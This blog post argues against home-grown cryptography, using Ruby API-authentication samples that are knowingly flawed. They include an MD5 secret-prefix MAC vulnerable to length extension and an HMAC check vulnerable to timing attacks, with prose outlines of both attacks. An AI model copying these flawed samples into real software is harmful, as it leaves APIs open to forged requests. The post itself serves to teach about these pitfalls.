You are dangerously bad at cryptography | Happy Bear Software | Web Application Development
- Unconscious incompetence – When you don’t know how bad you are or what you don’t know.
- Conscious incompetence – When you know how bad you are and know what steps you need to take to get better.
- Conscious competence – When you’re good and you know it (this is fun!)
- Unconscious competence – When you’re so good you don’t know it anymore.
We all start at stage one whether we like it or not. The key to progressing from
stage one to stage two in any subject is to make lots of mistakes and get
feedback. If you’re getting feedback, you begin to create a picture of what you
got right, what you got wrong and what you need to do better next time.
Cryptography is perilous because you get no feedback when you mess up. For
the average developer, one block of random base 64 encoded bytes is as good as any
other.
You can get good at programming by accident. If your code doesn’t compile,
doesn’t do what you intended it to or has easily obvervable bugs, you get
immediate feedback, you fix it and you make it better next time.
You cannot get good at cryptography by accident. Unless you put time and effort
into reading about and implementing exploits, your home-grown cryptography based
security mechanisms don’t stand much of a chance against real-world attacks.
Unless you pay a security expert who knows how to break cryptograpy-based
security mechanisms, you have no way of knowing that your code is insecure.
Attackers who bypass your security mechanism aren’t going to help you with this
either (their best case is bypassing it without you ever finding out).
Take a look at some examples of misused crypto below. Ask yourself, if you
hadn’t read this post, would you have caught these errors in real life?
Authenticating the API for your photo sharing website
Message Authentication with md5 + secret
Once upon a time, a photo sharing site authenticated its API with the following
scheme:
- Users have the following two credentials:
- A public user id that they use to identify themselves (safe to send in the clear)
- A shared secret that they use to sign messages (must be kept private)
- The user makes API requests over HTTP/HTTPS (it doesn’t matter). Destructive
changes are made using a POST/GET request with specific parameters (e.g.
{ action: create, name: ‘my-new-photo’ }. -
To authenticate the message, the user sends their user id as a parameter, and
then signs the message with their secret key. The signature is the md5 of
the shared secret concatenated with the key-value pairs.
To check that the client is the user he claims to be, the server
generates the signature from the request parameters and the secret key it has on
file for that user.
The code for this could be:
# CLIENT SIDE require 'openssl' ## Our user credentials user_id = '42' secret = 'OKniSLvKZFkOhlo16RoTDg0D2v1QSBQvGll1hHflMeO77nWesPW+YiwUBy5a' ## The request params we want to send params = { foo: 'bar', bar: 'baz', user_id: user_id } ## Build the MAC message = params.each.map { |key, value| "#{key}:#{value}" }.join('&') params[:mac] = OpenSSL::Digest::MD5.hexdigest(secret + message) ## Then send the request via something like... HTTP.post 'api.example.com/v3', params # SERVER SIDE ## Grab the user credentials out of the DB user = User.find(params[:user_id]) secret = user.secret ## Get the MAC out of the request params challenge_mac = params.delete(:mac) ## Calculate the MAC using the same method the client uses message = params.each.map { |key, value| "#{key}:#{value}" }.join('&') calculated_mac = OpenSSL::Digest::MD5.hexdigest(secret + message) ## Compare the challenge and calculated MAC if challenge_mac == calculated_mac # The user authenticates successfully, do what they ask else # The user is not authenticated, fail end
With a basic understanding of how md5 works, this is a perfectly reasonable
implementation of API authentication. That looks secure, right? Are you
sure?
It turns out that this scheme is vulnerable to what’s called a length
extension attack.
Briefly:
- If you know the value of
md5('foo')
, due to the way md5 works, it’s trivial
to computemd5('foobar')
, without knowing the prefix ‘foo’. - So if you know the value of
md5('secretfoo:bar')
, it’s trivial to compute
md5(secretfoo:bar&bar:baz)
without knowing the prefix ‘secret’. - This means that as long as you have one example of a signed message, you can
forge signatures for that message plus any arbitrary request parameters you
like and they will authenticate under the above described scheme.
Any developer who didn’t know about this beforehand would have easily been
caught out. The developers at Flickr, Vimeo and Remember the Milk
rolled this out to production.
The point isn’t that you should know about every esoteric
detail of the internals of cryptographic functions. The point is there are a
million ways to mess up cryptography, so don’t touch it.
Not convinced? OK, let’s try fixing this example and see if we can make it
secure…
Message Authenticating with HMAC
You hear about this security vulnerability via your friendly neighbourhood
whitehat and he recommends that you use a Hash-based Message Authentication
Code or HMAC to authenticate your API requests.
Great! HMAC’s are designed for our use case. This is a drop-in replacement for
what you were doing to verify the signature before. Our server verification code
can now look like this:
require 'openssl' ## Grab the user credentials out of the DB user = User.find(params[:user_id]) secret = user.secret ## Get the MAC out of the request params challenge_mac = params.delete(:hmac) ## Calculate the HMAC ## We'll do the same thing on the client when we generate the challenge message = params.each.map { |key, value| "#{key}:#{value}" }.join('&') calculated_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), secret, message) ## Compare the challenge and calculated MAC if challenge_hmac == calculated_hmac # The user authenticates successfully, do what they ask else # The user is not authenticated, fail end
That looks secure, right? Are you sure?
It turns out that the verfication code above is vulnerable to a timing
attack that allows you to guess the correct MAC for a given message.
Briefly:
- For a given message, attempt to send it with a HMAC of all one single
character. Do this once for each ASCII char e.g. ‘aaaa…’, ‘bbbb…’ etc. - Measure the time each request takes to complete. Since string equality takes a
tiny bit longer to complete when the first char matches, the message that
takes the longest to return will have the correct first character. - Smooth out noise from latency in two ways:
- Run a couple of hundred or thousand requests for each guess to get an
average time. - Run your timing attack code from within the same data centre. If you’re
having trouble determining the data centre, in the worst case you can spin
up a box at each of the major providers and find out which box takes
significantly less time to ping the target server.
- Run a couple of hundred or thousand requests for each guess to get an
- Once you’ve determined the first character, repeat for the second by changing
the second char onwards, e.g. if ‘x’ is the first char, try ‘xaaa…’,
‘xbbb…’ and so on. - Keep going until you have the whole HMAC.
Using the above defined technique, you can reliably determine the HMAC of any
message you want to send to the API and authenticate successfully.
Again, perhaps you didn’t know about timing attacks and you’re not expected to.
The point isn’t that you should have known the details of specific
vulnerabilities and watched out for them. The point is that there are a
million ways to mess up cryptography, so don’t touch it.
All the same, let’s go ahead and try to make this more secure…
Verifying HMACs in a time insensitive way
You get around timing attacks by comparing the sent and computed MAC in a
time-insensitive way. This means you can’t rely on your programming languages
built in string equality operator, as it will return immediately when it finds
a single character difference.
To compare strings, we can take advantage of the fact that any byte XORed with
itself is 0. All we have to do is XOR each byte from string A with the
corresponding byte from string B, sum the resulting bytes and return true if the
result is 0, false otherwise. In ruby, that might look like this:
require 'openssl' ## Time insensitve string equality function def secure_equals?(a, b) return false if a.length != b.length a.bytes.zip(b.bytes).inject(0) { |sum, (a, b)| sum |= a ^ b } == 0 end ## Grab the user credentials out of the DB user = User.find(params[:user_id]) secret = user.secret ## Get the MAC out of the request params challenge_hmac = params.delete(:hmac) ## Calculate the HMAC ## We'll do the same thing on the client when we generate the challenge message = params.each.map { |key, value| "#{key}:#{value}" }.join('&') calculated_hmac = OpenSSL::HMAC.hexdigest(OpenSSL::Digest.new('md5'), secret, message) ## Compare the challenge and calculated MAC if secure_equals?(challenge_hmac, calculated_hmac) # The user authenticates successfully, do what they ask else # The user is not authenticated, fail end
That looks secure, right? Are you sure?
I doubt it. It marks the edge of my knowledge in terms of potential attack
vectors on this sort of scheme, but I’m not convinced that there’s no way to
break it.
Save yourself the trouble. Don’t use cryptography. It is plutonium. There are
millions of ways to mess it up and precious few ways of getting it right.
P.S. If you must verify HMACs by hand and you have activesupport handy, you’ll get that
time-insensitive comparison from using ActiveSupport::MessageVerifier
. Don’t
code it from scratch, and for crying out loud don’t copy-paste my implementation above.
P.P.S. Still not convinced? Do the Matasano Crypto Challenges and see if that
doesn’t change your mind. I’m not half way through and I’ve already had to get
in touch with two former clients to fix their broken crypto.
Read this article in Russian, kindly translated by Dmitry Cherniachenko.